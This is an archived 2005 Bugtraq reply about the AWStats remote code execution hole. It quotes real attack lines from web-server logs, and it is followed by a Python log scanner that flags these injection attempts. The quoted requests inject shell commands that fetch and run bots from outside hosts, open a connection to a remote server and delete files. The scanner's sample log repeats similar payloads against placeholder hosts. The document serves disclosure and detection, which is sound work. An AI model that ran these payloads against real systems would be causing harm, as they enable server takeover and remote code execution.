lists.openwall.net - Open Source and information security mailing list archives
From: niels-bugtraq at bakker.net (Niels Bakker)
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution

* krustev@...stev.net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
> 
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

It's been out there for a while already:

208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"

Those files don't exist there anymore.


	-- Niels.

-- 
(please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for
 the gazillion autoresponders of course)
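The quoted access-log lines are the kind of evidence a defender wants to find in their own logs, and the third one shows why matching on the raw line is not enough: the payload is percent-encoded, and one parameter is double-encoded (`%2527`). The following is an added example, not code from either poster, that parses Apache combined-format lines, percent-decodes each query parameter twice, and flags `awstats.pl` requests whose parameter values carry shell metacharacters or download-and-execute command tokens. The sample lines are constructed (TEST-NET addresses, `.invalid` hostnames) and modeled on the lines quoted above; the token list is an assumption for illustration, not an exhaustive signature.

```python
"""Flag AWStats command-injection attempts in Apache combined-format access logs.

Added example; not part of the original mailing-list post.
"""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Apache/NCSA "combined" format:
# ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Characters that never belong in a legitimate AWStats parameter value
# (pipe, command separator, backtick, NUL, newline).
SHELL_META = re.compile(r"[|;`\x00\n]")

# Tokens typical of download-and-execute payloads. Assumption for illustration,
# not an exhaustive signature; matched only after decoding so that
# %77%67%65%74 and "wget" are treated alike.
SUSPICIOUS_TOKENS = ("wget ", "curl ", "cd /tmp", "chmod ", "perl ", "passthru(", "rm -rf")


def decode_twice(text: str) -> str:
    """Percent-decode twice so double-encoded payloads (%2527 -> %27 -> ') become visible.

    unquote() leaves malformed escapes (a bare %5, or %%) untouched, which keeps the
    decoder tolerant of log lines that were re-wrapped when pasted into mail.
    """
    return unquote(unquote(text))


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields; None if the line does not match."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def analyze(line: str) -> list:
    """Return one finding per suspicious awstats.pl parameter in the line (empty if clean)."""
    rec = parse_line(line)
    if rec is None:
        return []
    url = urlsplit(rec["target"])
    if not url.path.endswith("awstats.pl"):
        return []
    findings = []
    # Split on '&' ourselves: parse_qsl() also splits on ';' in older Pythons,
    # and ';' is exactly the separator these payloads use inside a single value.
    for piece in url.query.split("&"):
        name, _, raw_value = piece.partition("=")
        value = decode_twice(raw_value)
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell metacharacter in parameter value")
        tokens = [t.strip() for t in SUSPICIOUS_TOKENS if t in value]
        if tokens:
            reasons.append("command tokens: " + ", ".join(tokens))
        if reasons:
            findings.append({"ip": rec["ip"], "time": rec["time"], "param": name,
                             "decoded": value, "reasons": reasons})
    return findings


def scan(lines) -> list:
    """Run analyze() over an iterable of log lines and collect every finding."""
    return [f for line in lines for f in analyze(line)]


# Constructed sample log (TEST-NET addresses, .invalid hostnames), modeled on the
# lines quoted in the post: a benign AWStats hit, the configdir=| injection,
# the double-encoded rush/highlight variant, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?config=site&output=main HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://dropper.invalid/x;chmod%20777%20x;./x;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Adropper.invalid/ssh.a&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"',
    '203.0.113.10 - - [26/Jan/2005:07:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} param={f['param']}: {'; '.join(f['reasons'])}")
        print("    decoded:", f["decoded"].replace("\n", "\\n").replace("\x00", "\\0"))
```

Matching only on the path and on decoded parameter values, rather than on the whole raw line, is what makes the double-encoded `highlight` parameter show up: after one decode it still reads `%27.passthru(...)`, and only the second pass exposes the injected quote and function call. The newline hidden in the `rush` value (`%0A`) is also caught as a metacharacter, so a line wrapped in transit still triggers.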
